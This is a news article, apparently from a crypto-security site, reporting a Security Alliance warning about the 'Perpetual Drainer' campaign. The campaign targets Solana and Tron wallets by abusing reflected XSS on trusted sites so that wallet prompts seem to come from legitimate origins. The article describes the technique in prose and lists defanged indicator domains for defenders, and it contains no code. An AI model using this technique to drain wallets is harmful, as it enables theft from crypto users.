Security Alliance Warns of a More Dangerous Perpetual Crypto Drainer

By Leakd.com Authors

March 19, 2025

Cryptoasset security experts have found a new ongoing phishing campaign that targets cryptoasset users' wallets and is able to bypass traditional mitigations.

Security Alliance (SEAL) said it has identified a threat actor, Perpetual Drainer, that is specifically targeting users of the Solana (SOL) and Tron (TRX) blockchains.

According to the experts, the drainer is exploiting cross-site scripting (XSS) vulnerabilities to trick victims into believing that a legitimate website is requesting a transaction.

"This both bypasses many traditional mitigations implemented by wallets but also is more likely to convince a user to approve a transaction," SEAL emphasized.

They've explained that the drainer is using an affiliate model, meaning that the criminals behind the Perpetual Drainer develop the software and host the back-office infrastructure. Meanwhile, the affiliates deploy the drainer software and host the front-office infrastructure.

"In exchange for receiving the software to deploy, affiliates pay a portion of all stolen proceeds to the developers," SEAL added.

According to them, this drainer is unique in how it bypasses usual security mitigations implemented by wallets.

"Typically, when a user visits a website hosting a drainer, the wallet will receive a request from the malicious origin (for example, airdrop-contosocoin.com). However, when a victim visits a website hosting Perpetual Drainer, the wallet will receive a request from a trusted origin (for example, contoso.org)," they added.

SEAL explains that this is possible because the drainer redirects victims to a reflected XSS exploit on a trusted origin. Afterward, the drainer loads a script from the Perpetual Drainer infrastructure that contains the actual drainer logic, allowing the code to execute and rewrite the Document Object Model (DOM). This allows it to "display a wallet connection prompt and cause all requests to the wallet extension to originate from the trusted origin rather than the malicious origin."

The security experts say they're working with industry partners to identify, notify, and display temporary warnings on sites being exploited by Perpetual Drainer.

In the meantime, they recommend developers implement best practices to mitigate XSS attacks and review their access logs for Indicators of Compromise (IoCs) such as oncloudcdn[.]net, cloudapiroute[.]net, and exchangeart[.]net, because the malicious script will likely be visible within the request path or query parameters.